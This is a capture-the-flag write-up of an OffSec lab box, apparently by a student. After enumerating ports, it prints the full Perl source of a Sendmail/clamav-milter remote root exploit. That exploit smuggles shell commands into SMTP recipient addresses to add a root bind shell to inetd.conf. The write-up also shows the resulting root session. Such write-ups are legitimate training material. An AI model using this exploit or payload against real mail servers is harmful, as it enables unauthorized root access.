Mailing a plastic explosive

In this challenge I’m going to mail a C4 plastic explosive to the host. When this explodes, it leaves a small hole where we can enter to interact with root shell. To be honest, this exploit is one of my favorite ones from now on because it just goes HARD. Sometimes simplicity is the key to success.

Enumerating ports

Well, of course I have to do port scanning before doing anything:

┌──(kali㉿kali)-[~/Desktop/ClamAV]
└─$ nmap -sC -sV -A 192.168.121.42 -T5 -p- -Pn > nmapScan.output
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-29 14:46 EDT
Warning: 192.168.121.42 giving up on port because retransmission cap hit (2).
Stats: 0:03:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 38.21% done; ETC: 14:56 (0:05:38 remaining)
Nmap scan report for 192.168.121.42
Host is up (0.085s latency).
Not shown: 64716 closed tcp ports (reset), 812 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.209], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-title: Ph33r
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux Linux SNMP multiplexer
445/tcp open netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
Aggressive OS guesses: Dell Integrated Remote Access Controller (iDRAC5) (96%), OpenWrt White Russian 0.9 (Linux 2.4.30) (96%), Linux 2.6.28 (95%), Linux 2.6.9 - 2.6.27 (95%), Sony SMP-N200 media player (95%), Linux 2.6.21 (95%), Linux 2.6.5 (95%), Linux 2.6.18 (95%), Tomato 1.28 (Linux 2.6.22) (95%), Asus RT-AC66U router (Linux 2.6) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.14a-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2025-09-29T18:55:42-04:00
|_clock-skew: mean: 5h59m59s, deviation: 2h49m43s, median: 3h59m58s
|_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: share (dangerous)
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 86.32 ms 192.168.45.1
2 86.04 ms 192.168.45.254
3 86.35 ms 192.168.251.1
4 86.39 ms 192.168.121.42

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 557.52 seconds

This gives us SHIT TONS of information. Of course I read the description of the challenge, and it focuses on SMTP exploitation, but I just wanted to do something cool. I started working on SMB. I thought this would be interesting because there is guest account with dangerous permissions.

┌──(kali㉿kali)-[~/Desktop/ClamAV]
└─$ smbclient -L //192.168.121.42/ -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)
ADMIN$ IPC IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------
0XBABE 0xbabe server (Samba 3.0.14a-Debian) brave pig

Workgroup Master
--------- -------
WORKGROUP 0XBABE

This is quite fun. I tried connecting to ADMIN$ and print$ but they’re password protected. The problem with IPC$ is that it doesn’t give me anything interesting to play with, so I had to stop messing with that guy. Don’t pick on weak people.

I wasted some time on SMB enumeration and information gathering in general with various tools like enum4linux, rpcclient, smbclient and etc. but I never saw any progress, to be honest. That’s why I decided to go with HTTP (I saw that port later in the nmap scan output XD).

Well, this port was useless too.

Easter eggs are fun but they love to waste time

Alright. I just went to the page, and this was returned in the browser:

01101001 01100110 01111001 01101111 01110101 01100100 01101111 01101110 01110100 01110000 01110111 01101110 01101101 01100101 01110101 01110010 01100001 01101110 00110000 0011 0000 01100010

The title of the webpage was Ph33r. I went to CyberChef and converted binary to ASCII, and I got the output:

ifyoudontpwnmeuran00b

This means: if you dont pwn me ur a n00b. NOW I HAVE TO PWN IT, or I’ll be a noob. It’s time to enumerate SNMP port with nmap:

┌──(kali㉿kali)-[~/Desktop/ClamAV]
└─$ nmap -sU -p161 --script *snmp* 192.168.121.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-29 15:21 EDT
Nmap scan report for 192.168.121.42
Host is up (0.079s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-info:
| enterprise: U.C. Davis, ECE Dept. Tom
| engineIDFormat: unknown
| engineIDData: 9e325869f30c7749
| snmpEngineBoots: 60
|_ snmpEngineTime: 35m00s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Status: up
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| eth0
| IP address: 192.168.121.42 Netmask: 255.255.255.0
| MAC address: 00:50:56:9e:c5:01 (VMware)
| Type: ethernetCsmacd Speed: 100 Mbps
| Status: up
| Traffic stats: 6.52 Mb sent, 6.18 Mb received
| sit0
| MAC address: 00:00:00:00:c5:01 (Xerox)
| Type: tunnel Speed: 0 Kbps
| Status: down
|_ Traffic stats: 0.00 Kb sent, 0.00 Kb received
| snmp-sysdescr: Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
|_ System uptime: 35m2.82s (210282 timeticks)
| snmp-processes:
...
| Name: clamd
| Path: /usr/local/sbin/clamd
| 3778:
| Name: clamav-milter
| Path: /usr/local/sbin/clamav-milter
| Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
| 3787:
| Name: inetd
| Path: /usr/sbin/inetd
| 3791:
| Name: nmbd
| Path: /usr/sbin/nmbd
| Params: -D
| 3793:
| Name: smbd
| Path: /usr/sbin/smbd
| Params: -D
| 3797:
| Name: snmpd
| Path: /usr/sbin/snmpd
| Params: -Lsd -Lf /dev/null -p /var/run/snmpd.pid
| 3798:
| Name: smbd
| Path: /usr/sbin/smbd
| Params: -D
| 3804:
| Name: sshd
| Path: /usr/sbin/sshd
| 3882:
| Name: sendmail-mta
| Path: sendmail: MTA: accepting connections
...
|_ Params: -D
| snmp-netstat:
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:80 0.0.0.0:0
| TCP 0.0.0.0:139 0.0.0.0:0
| TCP 0.0.0.0:199 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| TCP 192.168.121.42:445 192.168.45.209:42578
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 1.0.0.127:32841 *:*
| UDP 42.121.168.192:137 *:*
|_ UDP 42.121.168.192:138 *:*
| snmp-brute:
|_ public - Valid credentials

  

Nmap done: 1 IP address (1 host up) scanned in 41.36 seconds

Of course the output itself was much larger, but I replaced some process information with ... to make it look shorter and easier to understand. According to the description of the challenge, the most interesting processes are going to be clamav-milter and sendmail-mta. I can just look the exploit up with searchsploit to see if there is anything.

┌──(kali㉿kali)-[~/Desktop/ClamAV]
└─$ searchsploit clamav-milter
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution | multiple/remote/4761.pl
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Of course, there is one. I just ran the command:

┌──(kali㉿kali)-[~/Desktop/ClamAV]
└─$ perl /usr/share/exploitdb/exploits/multiple/remote/4761.pl 192.168.121.42

This creates a bind root shell on TCP port 31337. After it appends the payload to the /etc/inetd.conf file (which is the inetd service configuration file), it restarts the service. Then we’re good to go. I can just connect to the target:

┌──(kali㉿kali)-[~/Desktop/ClamAV]
└─$ ncat 192.168.121.42 31337 -v
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.121.42:31337.
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
whoami
root
cd /root
ls
dbootstrap_settings
install-report.template
proof.txt

There is no need to get the prompt because I’m already a root user, and I can just read flag files and submit the answer to OffSec.

Unpacking the C4 explosive

BEWARE!!! This is done by professionals, and you shouldn’t try this at home. I took the PERL script and analyzed it:

### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print  "Sendmail w/ clamav-milter Remote Root Exploit\n";
print  "Copyright (C) 2007 Eliteboy\n";

if ($#ARGV != 0) {print  "Give me a host to connect.\n";exit;}
print  "Attacking $ARGV[0]...\n";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');

print  $sock  "ehlo you\r\n";
print  $sock  "mail from: <>\r\n";
print  $sock  "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print  $sock  "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print  $sock  "data\r\n.\r\nquit\r\n";

while (<$sock>) {
print;
}

# milw0rm.com [2007-12-21]

As you can see, this is sending an email to the server, and the payload is this:

echo  '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf
/etc/init.d/initd  restart

These two commands are being run, which binds the root shell during startup of the inetd service. This allows me to connect to the server with simple tools like ncat and inject OS commands.

What I don’t understand

Alright. The challenge was great and fun, but I don’t understand why there were SMB and SSH services. When talking about SSH service I don’t mean 22/tcp port but 60000/tcp port. Are there other ways to gain a shell on this machine? I tried several methods and techniques, but all of them failed. I even tried buffer overflow attacks but failed.

In my opinion, these services are left to waste the time of the people who are solving the challenge. Let’s be honest. There was absolutely NO need for SMB or even SSH service on port 60000/tcp. I just wasted ~15 minutes enumerating SMB and trying to exploit “weaknesses” that gave nothing in return. Just explain to me why people create CTFs this way…